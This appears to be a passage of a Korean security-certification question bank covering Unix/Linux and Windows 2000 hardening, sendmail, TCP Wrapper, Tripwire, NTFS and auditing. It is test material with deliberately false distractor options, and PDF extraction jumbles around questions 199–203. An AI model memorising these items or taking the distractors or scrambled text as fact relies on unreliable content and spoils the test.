작업으로 맞게 짝지어 진 것은? 1) #smitty user -> Change/Show Characteristics of a User -> root에서 Another user can SU TO -> TRUE 2) #smitty user -> Change/Show Characteristics of a User -> root에서 User can LOGIN REMOTELY? -> False 3) /etc/security/user에서 root의 rlogin=false확인 4) 설정 후 적용을 바로 하기 위해 rebooting을 해야 한다. 1 1), 2), 4) 2 2), 3), 4) 3 3), 4) 4 1), 2), 3) 157. 유닉스 시스템에서 로컬 호스트의 이더넷 주소 (MAC 주소)를 볼 수 있는 명령은? 1 ifconfig 2 netstat 3 nslookup 4 ulimit 158. NIS 데몬 중 하나인 rpc.yppasswdd 버퍼 오버플 로 취약성이 발견되어 이를 점검하려고 한다. 시스템 에서 rpc.yppasswdd를 서비스하고 있는지 확인하는 방법으로 옳은 것은? 1 # rpcinfo -p grep # ps -ef grep inetd 3 # telnet localhost rje 4 # man rpc 159. 스팸 메일 방지를 위한 보안대책으로 Sendmail 8.9.0으로 버전이 높아지면서 새롭게 추가된 기능이 anti-spam과 관련된 기능으로 볼 수 있는데, 이에 대 한 설명으로 옳지 않은 것은? 또한 아래 보이는 것은 /etc/mail/access 파일의 내부 형식을 보여 주고 있다. [email protected] REJECT useful.org OK RELAY 1 access 파일에서 첫 번째 필드는 Address, Domain Name, IP Address 등이 올 수 있고, 두 번째 필드는 메일에 대한 처리를 결정한다. 2 Access DB는 access란 이름으로 파일 시스템에 저 장되고 makemap 명령을 실행하게 되면 access.dir 과 access.pag라는 이름으로 DB가 생성된다. 3 access의 파일 구조는 텍스트 파일이며, Sendmail 이 인식할 수 있는 DB형태로 만들어 주기 위해 makemap이란 프로그램을 사용한다. 4 이미 Access DB가 만들어져 있다면, 다른 메일 정 책이 /etc/mail/access 파일에 추가되더라도 makemap을 사용할 필요가 없다. 80
81 160. /etc/sendmail.cf 파일은 sendmail의 가장 중요한 설정 파일로 sendmail은 메일을 보내고 받을 때마다 /etc/sendmail.cf 파일을 해석하여 실행을 하게 된다. 이런 이유로 /etc/sendmail.cf 파일 설정에 대한 관리 가 철저히 이루어져야 하는데 아래 내용에 대한 설명 으로 옳지 않은 것은? 1 FR-o /etc/mail/relay-domains 2 Kaccess hash -o /etc/mail/access.db 3 O ForwardPath=$z/.forward.$w:$z/.forward 4 O Timeout.queuewarn=4h 1 1에서 지정된 relay-domains 파일에는 Relay를 제 한할 호스트의 이름을 설정하는데 사용된다. 2 2에서는 Relay를 허용하거나 거부할 특정 IP와 도 메인을 설정하는 파일이며 relay-domains보다 사용 이 편리하므로 많이 사용된다. 3 3에서는 특정 메일계정으로 들어온 메일을 다른 메일로 곧바로 보내주는 포워딩 파일을 설정한다. 4 4에서는 큐 디렉터리에 쌓인 메일이 지정한 시간 안에 전송되지 못할 경우 메일을 보낸 사람에게 경고 메일을 보내기 위한 설정이다 sendmail의 별명(Alias)이 제공해 주는 것이 아닌 것은? 1 개인사용자들에게 다른 이름(별명) 제공 2 메일을 다른 호스트로 전달 3 메일 주소를 해석하고 배달 프로그램으로 전달 4 메일링 리스트 162. 다음 중 sendmail 에 관련된 설명 중 틀린 것은 무엇인가? 1 sendmail.cf 파일은 여러 가지 환경을 설정할 수 있 게 하는 환경파일이다. 2 /etc/mail/access 파일은 처음부터 만들어지지 않으 므로 사용자가 만들어줘야 하는 파일이다. 3 /etc/mail/access 파일은 접근금지나 허용 등을 IP나 도메인별로 설정할 수 있게 한다. 4 sendmail은 보안을 강화하기 위하여 third party relay 기능을 제공한다 다음의 내용이 설명하는 것은 어떤 데몬 인가? (시스템에서 일어나는 모든 상황들이 기록되는 데 몬으로 외부 비인가자가 루트 권한을 획득한 후 제 일 먼저 kill시키는 행동을 할 만큼 시스템의 모든 기능을 관리 기록하는 데몬) 1 xinetd 2 inetd 3 syslogd 4 lpd 164. 로컬 시스템 상에서의 버퍼 오버플로 공격은 스 택 영역에 있는 명령을 실행시킬 수 있기 때문에 가능 하다. 솔라리스 시스템에서 버퍼 오버플로를 예방하기 위한 방법으로, 스택에 있는 명령을 실행하지 못하도 록 아래와 같이 설정할 수 있다. 다음 중 아래의 내용 을 설정하는 파일을 고르면? set noexec_user_stack=1 set noexec_user_stack_log=1 1 /etc/system 2 /etc/hosts.equiv 3 /etc/default/inetinit 4 /etc/profile 165. 리눅스 시스템 설치 후 시스템을 안전하게 만들 기 위해 몇 가지 기초적인 보안 설정을 하려고 한다. 아래 보기 중 기초 보안 설정에 대한 설명으로 옳지 않은 것은? 1 BIOS 패스워드를 잊어버리더라도 계속해서 재설정 할 수 있기 때문에 상관없다. 2 리눅스 설치 시 자동으로 생성되는 lp, sync 등 실 제로 사용하지 않는 계정에 대해서는 없애는 것이 좋다. 3 패스워드 길이 설정값이 너무 작다면 /etc/login.defs 파일에서 PASS_MIN_LEN 변수 값을 재설정한다. 4 root 계정에 대해서 일정시간 후 자동으로 로그아 웃되도록 /etc/profile의 TMOUT 변수 값을 재설정 한다. 81
82 166. 초보 관리자는 리눅스 시스템 구축 후 회사의 보 안 설정 매뉴얼에 따라 다음과 같이 입력하였다고 한 다. 아래에서 보여주고 있는 설명으로 옳지 않은 것 은? rm -f /etc/security/console.apps/halt rm -f /etc/security/console.apps/poweroff rm -f /etc/security/console.apps/reboot rm -f /etc/security/console.apps/shutdown 1 shutdown, reboot, halt, poweroff와 같은 프로그램 을 콘솔에서 실행하지 못하도록 한다. 2 위와 같이 명령 실행 후, 일반사용자가 halt 입력 시 바로 실행되지 않고 루트 패스워드를 입력하면 실행된다. 3 위의 rm -f는 halt, pweroff, reboot, shutdown 명 령을 콘솔에서 사용 못하게 하기 위함이다. 4 /etc/security/console.apps에서 halt를 실행하였을 경우 시스템이 아무런 반응이 일어나지 않는다 리눅스시스템 운영관리 시 일어날 수 있는 여러 상황을 해결하기 위한 방법으로 가장 적절하지 않 은 것은? 1 알 수 없는 이유로 시스템이 느려졌다는 생각이 들 면 netstat -an grep SYN wc를 실행해 SYN_RECV 상태를 보고 현재 TCP와 UDP socket의 상태를 확 인한다. 2 정전 혹은 예기치 못한 상황 발생으로 시스템 reset시 컴퓨터를 다시 켜면 자동으로 파일시스템 을 복구하지 못 할 경우가 있는데, 이때는 fsck 명 령을 사용해서 수동으로 파일 시스템을 복구할 수 있다. 3 시스템 점검 시 root 이외의 다른 사용자가 로그인 못하도록 할 때는 /etc/nologin파일을 만들어 시스 템 점검중 이라고 메시지를 써주면 된다. 4 일반사용자에게 접속 시 공지사항을 알리기 위한 방법으로 /etc/issue파일에 내용을 쓰는 방법으로 해결할 수 있다 솔라리스에서는 기본적으로 콘솔로만 root 로그 인이 가능하도록 되어 있다. 이에 대한 설정을 변경하 기 위해서는 /etc/default/login 파일에서 CONSOLE 변 수 값을 편집하게 된다. CONSOLE 변수 설정에 대한 설명으로 옳지 않은 것은? 1 CONSOLE=/dev/console 로 설정하면 콘솔로만 로 그인이 가능하다. 2 CONSOLE=/dev/ttya 로 설정하면 ttya로만 로그인 이 가능하다. 3 CONSOLE= 로 설정하면 로그인이 불가능하고, 일 반 계정으로 로그인 후 su를 이용해야 한다. 4 #CONSOLE= 로 설정하면 어떤 device에서든 로그 인이 불가능하다 웹 서버가 공격을 당했을 때 시스템에 영향을 줄 이기 위해 웹 서버가 제한된 자원을 사용하도록 하는 도구는? 1 CGI 2 majormodo 3 daemontool 4 chrootuid 170. 침입을 당했을 때 로그파일을 비롯한 여러 파일 의 환경설정이나 접근권한, 일부 파일이 변조나 삭제 가 된다. 시스템의 변조되기 전, 해더값의 체크썸 (checksum)을 저장하여 파일의 변조, 삭제 시 원래의 파일과 비교 대조할 수 있는 피해 분석 도구는? 1 snort 2 tcpdump 3 netstat 4 tripwire 171. 위츠 베네마가 작성한 TCP Wrapper 패키지는 들 어오는 네트워크 트래픽을 감시하고 네트워크 활동을 제어하면서 서비스를 보호하는데 사용된다. TCP Wrapper에 대한 설명으로 옳지 않은 것은? 1 TCP Wrapper는 매우 간단하지만 특정 서비스(특정 포트)가 연결될 때마다 실행하도록 설정할 수 있는 매우 효과적인 소프트웨어이다. 2 서비스에 대한 요청이 들어오면 inetd는 tcpd를 실 행하고 TCP Wrapper 환경설정과 비교해서 그 요 청을 기록할 것인지와 그 요청을 실행할 것인지 평가한다. 3 TCP Wrapper는 TCP 기반의 서비스에 대해서만 지 원한다. 4 TCP Wrapper는 인증하기 위해서 출발지의 IP 주소 를 사용하고 설정파일로는 hosts.allow 파일과 hosts.deny 파일이 있다. 82
83 172. TCP Wrapper와 Tripwire에 대한 설명이다. 맞는 것을 고르면? 1 TCP Wrapper는 네트워크 서비스에 대한 접근을 통제하는 기능을 하지만 접근에 대한 로그는 생성 하지 않는다. 2 Tripwire의 tw.config 파일에는 감시할 파일과 디렉 터리의 목록이 암호화되어 저장된다. 3 TCP Wrapper에 포함된 tcpd는 네트워크 서비스 요청이 있을 때마다 요청된 서비스와 IP의 유효성 을 검사한다. 4 공격이 완료되면 호스트의 데이터가 파괴되거나 변 조될 가능성은 없다 아래 보기는 보안관리 도구에 관한 설명이다. 설 명으로 옳지 않은 것은? 1 MD5는 해쉬 알고리즘에 따라 체크썸 정보를 제공 해 줌으로써 중요한 파일의 변조 유무를 확인할 수 있다. 2 COPS는 파일과 디렉터리 무결성을 검사할 뿐만 아 니라 네트워크 보안에 관련된 부분을 전부 검색해 준다. 3 netlog는 IP spoofing을 체크하기 위해 TCP와 UDP 등의 패킷 전송상황을 모니터할 수 있는 도구이다. 4 tripwire는 파일과 디렉터리의 무결성을 검사하는 도구이다 모니터링 프로그램은 침해사고 방지 및 대응에 유용하게 사용된다. 다음 중 시스템 모니터링과 네트 워크 모니터링으로 구분할 때 그 성격이 나머지랑 다 른 것을 고르면? 1 snort 2 tcpdump 3 netstat 4 wtmp 174. 사용자가 예측 가능한 패스워드를 사용할 경우 외부의 패스워드 무작위대입공격에 뚫릴 위험이 있다. 다음 중 취약한 사용자의 패스워드를 색출하기 위하여 점검 도구가 아닌 것은? 1 Swatch 2 Crack 3 John the ripper 4 L0phtcrack 175. TCP Wrapper는 네트워크 접근제어 환경설정을 구성하는 프로그램이다. 사용 시 설정해야할 설정환경 파일 중 옳은 것을 고르면? 1 /etc/passwd 2 /var/log/syslog 3 /etc/rc.d/init.d/lpd 4 /etc/hosts.allow, /etc/hosts.deny 176. 다음 중 침해탐지/피해 분석 도구가 아닌 것은? 1 autospy 2 chkrootkit 3 ethereal 4 kstat 178. 유닉스 시스템에서는 시스템의 상태를 점검하기 위한 다양한 도구들을 OS에서 제공하거나 또는 설치 할 수 있다. 다음 중 제공하는 도구명과 제공하는 기 능을 짝지은 것 중 틀린 것은? 1 syslog - 시스템과 사용자의 로그 제공 2 TCP Wrapper - 시스템에 대한 접근 제한 설정 3 quotas - 시스템 auditing 4 lsof - 프로세스 모니터링 179. 아래 도구들의 공통점은 무엇인가? (etherfind, packetman, snoop, esniff, tcpdump, netlog) 1 DDoS 공격도구 2 공개용 침입차단시스템 3 스니퍼 4 암호화 도구 180. Solaris 시스템의 /etc/default/login 파일은 패스 워드에 관한 여러 가지 설정들을 변경할 수 있는 항목 들이 있는데 다음 중 /etc/default/login 파일을 통해 변경할 수 없는 항목은 무엇인가? 1 사용자 생성 시 적용되는 최소 패스워드 길이 설정 2 root 유저의 원격 로그인 허용 유무 설정 3 사용자의 입력이 없으면 자동으로 터미널이 끊기도 록 설정하는 TIMEOUT 설정 4 사용자 umask 설정 83
84 181. 해커가 시스템에 존재하는 계정을 알아내기 위한 방법으로 여러 가지 방법이 있다. 이런 방법들 중에서 다음에 나타나는 결과 값은 어떤 명령어를 이용한 결 과인가? Sending broadcast for rusersd protocol version root oracle dwpp devel master dev.test.com root dev oracle web Sending broadcast for rusersd protocol version finger 2 rusers 3 sendmail(expn,vrfy) 4 null session 182. 다음은 일반적인 유닉스 시스템의 /etc/passwd 파일을 나타낸 것이다. 이에 대한 설명으로 올바르지 않은 것은 무엇인가? 1 bin:x:2:2::/usr/bin: 항목과 같이 마지막 로그인 쉘이 부여되어 있지 않으면 시스템에 따라 기본 쉘인 /bin/sh이 자동으로 할당 될 수 있다. 2 lp, uucp,nuucp와 같은 계정들은 잘 사용하지 않는 계정이므로 제거하는 것이 좋다. 3 sshd:x:128:100:sshd privsep:/var/empty:/bin/false 항목과 같이 마지막 로그인 쉘 부분이 /bin/false로 되어 있을 경우 로그인 쉘이 실행 불가능하게 된 다. 4 ksheo:x:101:1::/home/ksheo:/bin/sh 항목은 GID가 root와 동일하게 설정되어 있어 root유저와 동일한 사용자 권한을 가지게 된다 다음은 일반적인 유닉스 시스템의 로그인 과정에 사용되는 파일이다. 사용자가 시스템에 로그인 할 때 각 파일이 실행되는 순서를 올바르게 나타낸 것은 무 엇인가? 1/bin/sh 2/etc/profile 3/bin/login 4$HOME/.profile 184. 유닉스 시스템에서 FTP 접속을 금지할 사용자를 기록해서 불법적인 사용자의 FTP 사용을 금지하는데 사용되는 파일명은 다음 중 무엇인가? 1 $HOME/.rhosts 2 /etc/inetd.conf 3 /etc/ftpusers 4 /usr/sbin/in.ftpd 185. 리눅스 시스템에서 계정의 패스워드를 MD5 알고 리즘을 통해 암호화하고자 한다. 이를 설정하기 위해 수정해야 할 파일은? 1 /etc/passwd 2 /etc/shadow 3 /etc/profile 4 /etc/pam.d/login, /etc/pam.d/passwd 186. 보안 취약성을 제어하기 위해서는 벤더가 제공하 는 최신 보안패치를 해야 한다. SunOS의 sunsolve1.sun.com 사이트에서 최신 보안패치 파일을 다운로드 받았다. 패치를 수행하는 올바른 명령어는? 1 install 2 pkgrm -p 3 patchrm 4 patchadd 187. 윈도우 2000 서버에서 기본적으로 열려진 포트에 대한 설명 중 옳지 않은 것은? 1 HTTP : 80 port (TCP) 2 DNS : 53 port (TCP, UDP) 3 FTP : 21 port (TCP) 4 FINGER : 22 (UDP) 188. 다음 중 Windows 인증 프로토콜에 해당하지 않 은 것은? Kerberos 3 NTLM v2 2 MSV1_0 4 CIFS 84
85 189. Windows 2000의 보안 관리를 위한 설명 중 옳 지 않은 것을 고르면? 1 관리자 암호와 사용자 암호를 정기적으로 바꾼다. 2 시스템 로그, 보안로그가 없으므로 따로 로그관리 프로그램을 설치한다. 3 웹서비스, ftp서비스의 로그를 정기적으로 점검한 다. 4 정책 설정에서 보안상 중요한 감사기록에 대한 로 그를 설정하여 정기적으로 점검한다 Windows의 MMC(Microsoft Management Console)는 시스템을 관리하는데 중요한 관리도구이 다. 다음 중 MMC에 대한 잘못된 설명은? 1 모든 버전의 윈도우에 제공된다. 2 MMC 자체로는 관리 기능이 없고 스냅인이라는 관 리응용 프로그램을 관리한다. 3 MMC를 통해 여러 가지 작업관리를 동일한 인터페 이스를 이용해 할 수 있다. 4 MMC는 한 개 이상의 스냅인을 포함하는 콘솔이라 는 관리 도구를 생성하고 관리한다 PC(Personal Computer) Win 98을 OS로 많이 사 용하는데 이것은 보안 상 안전한 설정이 기본적으로 포함되어 있지 않다. 개인 PC의 안전한 설정을 위한 방법 중 적절치 않은 것은? 1 BIOS 암호 설정 2 개인 Firewall 설치 3 화면 보호기 암호 설정 4 디렉토리 접근제어 설정 191. Windows 2000을 이용한 보안에 대한 설명 중 잘못된 것은? 1 windows 계열이 아닌 타 OS 환경의 서버와의 접 속은 보안이 되지 않는다. 2 NTFS 파일 시스템을 이용하여 사용자의 접근을 제 한할 수 있다. 3 보안 템플릿을 이용하여 보안 설정을 일괄적으로 할 수 있다. 4 IPSEC를 이용하여 네트워크 액세스를 보호할 수 있 다 다음 중 Windows(NT 4.0, 2000, XP)시스템에 최 신 버전의 패치가 깔려있는지 확인하도록 도와주는 프 로그램은? 1 runas.exe 2 hfnetchk.exe 3 winhelp.exe 4 notepad.exe 193. 다음 중 Windows 백업에 대한 설명 중 올바르지 못한 것은? 1 암호화된 파일은 기본적으로 암호화된 채 백업된 다. 2 시스템 상의 문제가 생겼을 때 복원하기 위해 백업 을 한다. 3 백업은 주기적으로 하는 것이 좋다. 4 디스크 전체가 아닌 부분적인 백업도 가능하다 다음 설명 중 Windows 보안 템플릿에 대해 올바 르지 못한 것은? 1 일관된 보안 설정을 좀 더 쉽게 적용할 수 있게 해 준다. 2 MMC에 보안 템플릿 스냅인을 추가함으로써 사용 가능하다. 3 보안템플릿은 계정정책, 로컬정책 등의 범주로 구 성되어 있으며 세부 설정이 가능하다 4 미리 설정되어 있는 템플릿을 이용할 수 없다 Windows 2000에서는 사용자에게 여러 로그를 제공하고 있다. 다음 중 windows 2000에서 제공하는 로그에 대한 잘못된 설명은? 1 windows에서 제공되는 로그는 응용프로그램 로그, 시스템 로그, 보안 로그이다. 2 보안 로그에 수록되는 내용은 관리 도구를 이용해 서 설정할 수 있다. 3 로그는 일반 텍스트 파일로 저장된다. 4 수록된 로그는 이벤트 뷰어를 통해 볼 수 있다 Windows에서 로그는 시스템이나 보안 상 문제점 이 생겼을 때 이유를 찾거나 점검을 할 때 도움을 줄 수 있다. 다음 중 로그를 관리하는 방법이 잘못된 것 은? 1 로그파일을 따로 저장해야 할 경우 메뉴 중 다른 이름으로 저장 을 이용한다. 2 로그는 시스템 자원을 차지하므로 자주 지워준다. 3 최대 로그 크기는 해당 로그의 등록정보에서 설정 해 줄 수 있다. 4 로그 중 필요한 부분만을 참조해야 할 경우 필터링 을 사용하면 된다. 85
86 198. Windows는 기본적으로 여러 가지의 로그를 제 공한다. 다음 중 관리자가 시스템으로의 로그온 성공 과 실패 내역을 보고자 할 때 어느 로그를 참고해야 하는가? 1 파일 복제 서비스 로그 2 시스템 로그 3 DNS 로그 4 보안 로그 199. Windows는 기본적으로 시스템을 관리할 수 있 는 여러 도구들을 제공하고 있다. 다음 중 로그를 조 회하고 관리할 수 있는 도구는? 202. 다음은 Windows 환경에서 파일 공유에 관한 설 명이다. 옳은 것을 모두 고르면? 1 NTFS 권한과 공유 권한이 동시에 설정될 경우 NTFS 권한 설정 내용이 공유 권한 설정보다 우선 한다. 2 공유 설정 시 디폴트로 주어지는 사용권한은 보안 상 안전하다. 3 드라이브의 등록정보 창에서 공유정보 확인할 수 있으며 명령창에서는 netuse로 확인한다. 4 hidden 공유의 경우에는 공유이름 끝에 # 이 붙는 다. 1 시스템 정보 3 보안 템플릿 2 이벤트 뷰어 4 IPSEC 203. Windows 2000의 파일 암호화에 관한 설명이다. 다음 중 옳지 않은 것은? 200. NTFS(NT File System)은 MS 사의 Windows NT/2000 에 적용되는 파일 시스템이다. NTFS에 관한 설명 중 옳지 않은 것을 고르면? 1 32-bit 주소 공간을 사용한다. 2 TCSEC의 A2 레벨 보안에 필수적인 요소이다. 3 임의 접근 제어(discretional access control)가 가능하다. 4 높은 보안수준의 보안을 제공한다 Windows 2000에서 인트라넷의 네트워크 접근을 위한 폴더 공유에 관한 설명이다. 잘못된 것은? 1 공유는 읽기와 쓰기 접근 권한을 등록된 계정을 가 진 사용자 별로 별도로 지정할 수 있다. 2 웹공유만 지정해도 등록된 계정을 가진 사용자는 로컬 네트워크로 읽기 권한 접근이 가능하다. 3 Windows 2000 설치 시 기본적으로 c$ 로 공유되 어 있지 않다. 4 웹공유만을 지정해도 등록된 계정을 가진 관리자는 로컬 네트워크로 읽기 쓰기 접근이 가능하다. 1 시스템 파일을 모두 암호화하면 시스템을 재시작할 수 없는 상황이 발생할 수 있다. 2 암호화된 파일을 NTFS 포맷이 아닌 파티션으로 복 사하는 것은 보안상 바람직하지 않다. 3 폴더를 암호화할 때는 그 폴더 안에 새로이 생성되 는 파일은 반드시 새로 암호화를 해야 한다. 4 폴더를 암호화하면 시스템의 오버헤드를 증가시키 므로 바람직하지 않다 다음 중 NTFS(New Technology File System)에 대한 설명 중 잘못된 것은? 1 FAT(File Allocation Table) -> NTFS는 지원되지만 NTFS -> FAT은 지원되지 않는다. 2 파일 시스템 수준의 보안을 제공한다. 3 모든 Windows에서 NTFS를 지원한다. 4 Windows에서 제공되는 파일 시스템이다 다음 중 FAT32(File Allocation Table 32)로 포맷 된 C:를 NTFS(New Technology File System)로 변환하 는 명령어는? 1 convert 2runas/profile/env/user:mydomain \admin "mmc%windir%\system\dsa.msc" 3 convert c: /fs:ntfs /v 4 format c: 86
87 206. Windows에서 사용 권한을 설정할 때 올바르지 못한 것은? 1 NTFS 사용 권한을 표준화하기 위해 보안 템플릿과 그룹정책을 사용한다. 2 사용권한이 설정된 파일을 복사하면 사용권한도 복 사된다. 3 사용자에게 필요한 최소한의 권한만을 설정한다. 4 사용권한은 NTFS 파일 시스템에서만 설정할 수 있 다 다음 중 NTFS 사용권한과 허용된 작업이 잘못 설명된 것은? 1 읽기 - 파일읽기, 속성 소유권 사용권한 보기 2 쓰기 - 파일 덮어쓰기, 속성 변경, 소유권 사용권한 보기 3 읽기 및 실행 - 읽기 권한, 응용프로그램 실행 4 수정 - 읽기 권한, 쓰기 권한, 파일 수정, 소유권 변경 208. Windows에서 공유 설정에 대해 잘못된 것은? 1 NTFS 파일 시스템에서만 적용된다. 2 폴더의 등록정보 - 공유 탭에서 설정할 수 있다. 3 네트워크 접근 보안에 사용된다. 4 필요한 최소한의 권한만을 설정해야 한다 보안을 위해 Windows에서 제공하는 파일 암호화 를 사용하였을 경우 다음 중 파일의 암호화가 유지되 는 경우는? 1 FAT 볼륨으로 복사 2 네트워크상으로 복사 3 NTFS 볼륨으로 복사 4 플로피디스크나 CD로 복사 210. 다음 중 Windows의 c:\temp 및 그 하위 디렉터 리를 암호화하는 명령은? 1 winhelp 2 cipher /e /d /s:c:\temp 3 dir/w 4 runas 211. Windows 2000의 Active Directory의 보안 기능은 Active Directory 계층 구조, 신뢰관계, 그룹 정책을 사 용한 관리를 지원한다. 그 중 신뢰 관계 형성과 관련 이 없는 것은? 1 전이 신뢰 - 트리(Tree)나 포레스트(Forest)의 구성 원인 모든 도메인에 자동으로 적용되며 A가 B를 신뢰, B가 C를 신뢰하면 A가 C를 신뢰하는 구조이 다. 2 상호 신뢰 - 서버와 클라이언트 간의 신뢰 관계를 형성하는 구조이다. 3 바로가기 신뢰 - 두 도메인간의 신뢰 경로를 줄이 기 위해 사용된다. 4 외부 신뢰 - 다른 포레스트(Forest)에 있는 Windows 2000 도메인들 간의 신뢰 관계를 형성한 다 Windows 2000에서는 효율적으로 액세스 권한을 관리하기 위해 사용자와 기타 객체들을 보안 그룹으로 구성할 수 있다. 아래 중 보안 그룹의 유형이 아닌 것 은? 1 도메인 로컬 그룹 - 도메인 로컬 그룹에는 다른 도 메인 로컬 그룹이 포함될 수 있다. 2 글로벌 그룹 - 공통액세스 필요를 고유하거나 비슷 한 직무를 수행하는 사용자들을 그룹화 할 수 있 다. 3 유니버설 그룹 - 여러 도메인에서 작성된 글로벌 그룹이 그룹화 된다. 4 슈퍼유저 그룹 - 각 도메인들의 Administrator들의 그룹이다 다음 중 Windows에서 사용자 디스크 할당량에 대해 잘못된 설명은? 1 할당량을 설정하고자 하는 디스크의 등록정보 - 할당량 탭에서 설정할 수 있다. 2 NTFS 파일 시스템에서만 설정할 수 있다. 3 할당량 관리사용 체크 박스에 체크하면 기존의 사 용자에게도 적용된다. 4 사용자가 디스크 용량을 과도하게 사용하는 것을 방지한다. 87
88 214. 다음 중 Windows의 프린터 사용 권한에 대해 잘 못된 설명은? 1 시작 - 설정 - 프린터 및 팩스 에서 설정할 수 있다. 2 사용자에게 필요한 최소한의 권한만을 주어야 한다. 3 프린터로 전송되는 데이터도 암호화할 수 있다. 4 사용자뿐만 아니라 그룹 단위로도 권한설정을 할 수 있다 다음 중 Windows의 작업과 필요한 프린터 사용 권한이 잘못 짝지어진 것은? 1 문서인쇄 - 인쇄, 문서관리, 프린터관리 2 문서일시 정지 - 문서관리, 프린터 관리 3 프린터 공유 - 인쇄 4 사용권한 변경 - 프린터 관리 216. Windows에서, 프린터의 소유주가 프린터를 관리 하기 힘들 때 다른 사용자가 그 소유권을 가져와 관리 를 해야 한다. 다음 중 프린터의 소유권을 가져올 수 있는 사용자가 아닌 것은? 1 관리사용 권한을 가진 그룹 2 관리자 그룹 3 파워 유저 그룹 4 Guest 그룹 217. 다음 중 Windows 레지스트리 보안에 대해 잘못 된 설명은? 1 실행창에서 regedit32를 실행한 후 메뉴 중 보안을 선택하면 설정할 수 있다. 2 레지스트리를 주기적으로 백업받아야 한다. 3 레지스트리에는 윈도우에서 컴퓨터에 관한 구성이 저장되어 있다. 4 윈도우의 세부적 세팅을 가능하게 하기 위해 모든 사용자가 접근 가능하게 해야 한다 Windows 2000 보안 구조에 대한 설명 중 옳지 못한 것은? 1 SAM(Security Accounts Manager)이 사용자 계정 이름과 패스워드 정보를 담고 있다. 2 보안 원칙은 사용자(User), 그룹(Group), 다른 사용 자(Other)로 이루어졌다. 3 도메인 컨트롤러들에서 사용자 계정/해쉬 데이터는 AD(Active Directory)에 보관된다. 4 트리(Tree)와 포레스트(Forest)라 불리는 Supra-domain 구조가 AD(Active Directory)의 구조 내에서 도메인들보다 상위에 존재하며 신뢰의 경 계는 포레스트이다 다음 중 Windows 터미널 서비스를 사용할 때 보 안상 적절치 않은 것은? 1 터미널 서비스 서버 시스템의 모든 볼륨을 NTFS로 하여 접근을 제한한다. 2 전송되는 데이터 암호화를 설정한다. 3 서비스 사용자에게 적절한 사용 권한을 부여한다. 4 윈도우 2000이 아닌 컴퓨터가 접근할 수 있기 위 해 fat 볼륨을 사용한다 Windows NT 운영체제의 보안을 설정하기 위한 방법 중 그 성격이 다른 보기에 비해 적절하지 못한 것은? 1 관리자 암호와 사용자 암호를 정기적으로 바꾼다. 2 시스템 성능 모니터를 통해 수시로 보안 실패 항목 을 살핀다. 3 www 서비스나 FTP 서비스에 접근하는 사용자들의 로그 기록이 남게 설정한다. 4 정책 메뉴에서 감사를 선택하여 중요한 요소들에 대한 감사에 대한 기록 설정을 한다 개인 PC 보안에 관한 설명이다. 다음 중 옳은 것 을 모두 고르면? 1 바이러스 및 백도어, 웜 점검 2 네트워크상의 공유 폴더에 대한 자료 유출 점검 3 디스켓, 하드 디스크, CD-RW를 통한 자료 유출 점 검 4 인터넷, , FTP, WWW로 유통되는 모든 파일 보안 점검 88
89 222. 다음은 개인 PC 보안 점검 항목을 설명한 것이 다. 다음 중 옳은 것을 모두 고르면? 1 디렉터리(데이터 공유), 패스워드 미설치 점검 2 운영체제의 문제점(설치 시 자동적으로 폴더 공유) 점검 3 바이러스 백신을 활용한 바이러스 웜 점검 4 화면 보호기 암호 설정 223. 최근 인터넷 대란에 이용된 Slammer 웜 바이러 스와 관련이 있기도 한 MS SQL 프로그램에 대한 설 명으로 올바르지 않은 것은 무엇인가? 1 SQL Server를 기본 설정으로 설치했다면 TCP/1433, UDP/1434를 포트를 모니터링한다. 2 SQL Server에서는 가능하면 FAT32 파일 시스템을 설치해서 파일 시스템의 보안을 강화해야 한다. 3 Microsoft Baseline Security Analyzer(MBSA)로 MsSQL 서버 보안을 점검할 수 있다. 4 SQL Server 연결할 때 되도록 이면 Windows 인증 모드를 요구해야 한다 Windows 시스템에서 이벤트 뷰어는 시스템에 일 어난 각종 이벤트들을 감시하기 위해 사용되는 프로그 램으로 시스템 에러나 각종 하드웨어 에러를 기록하는 데 유용하게 사용된다. 다음 중 이벤트 뷰어에 대한 설명으로 올바르지 않은 것은? 1 보안적인 측면에서 보안 로그가 가득 찼을 때 시스 템이 중지되도록 하는 것이 바람직하다. 2 응용 프로그램 로그에는 응용 프로그램이나 프로그 램에서 기록한 이벤트들이 수록된다. 예를 들어, 데 이터베이스 프로그램은 파일 오류를 응용 프로그 램 로그에 기록할 수 있다. 3 기본적으로 윈도우2000 시스템에서는 7일간의 로 그를 보존한다. 4 관리자만이 보안 로그, 응용 프로그램 로그 및 시 스템 로그에 접근할 수 있다 다음은 Windows시스템의 공유 폴더에 대한 설명 이다. 다음 중 올바르지 않은 것은 무엇인가? 1 레지스트리에 HKEY_LOCAL_MACHINE\System\CurrentCon trolset\services\lanmanserver\parameters\auto ShareServer 값을 새롭게 생성한 후 1값을 입력하 면 윈도우 기본 공유폴더가 부팅시 제거된다. 2 공유한 폴더를 복사한 경우 복사된 공유 설정이 없 어지지만 복사 원본 폴더의 공유 설정은 계속 유 지된다. 3 폴더 이름 뒤에 '$' 붙여 공유를 하고 이름을 share$라고 하면 이 폴더는 숨김 속성이 되어 보이 지 않게 된다. 4 윈도우 시스템은 설치 시 C$, Admin$와 같은 폴더 를 기본적으로 공유하게 된다 Windows 시스템은 9가지 감사 카테고리의 성공, 실패 여부를 기록하도록 구성할 수 있다. 다음 중 개 체 액세스 감사를 통해 탐지할 수 있는 항목이 아닌 것은 무엇인가? 1 훔친 패스워드로 침입 2 프린터에 대한 부적절한 접근 3 민감한 파일에 대한 부적절한 접근 4 바이러스 침입 227. 다음 중 ( )에 공통으로 들어갈 말은 무엇인가? ( )는 IBM PC를 위한 네트워크 인터페이스 체계로 네임, 세션, 데이터 그램의 세 가지 서비스를 제공하고 있다. 파일 시스템이나 프린트를 공유하기 위해서도 ( )가 필요하다. 윈 도우 NT 시스템이 인터넷에 직접 연결되어 있을 경우 공격 자가 쉽게 파일시스템을 사용할 수 있으므로 ( )에 대한 접 근 통제가 필요하다. ( )에 대한 접근제한으로 시스코 라우 터에서 다음과 같은 명령을 이용하여 ( )를 차단할 수 있 다. 1 NetBEUI 3 TCP/IP 2 NetBIOS 4 SMB 89
